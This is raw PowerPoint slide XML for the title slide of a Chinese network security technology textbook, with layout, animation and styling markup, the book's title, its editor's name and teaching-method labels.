                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
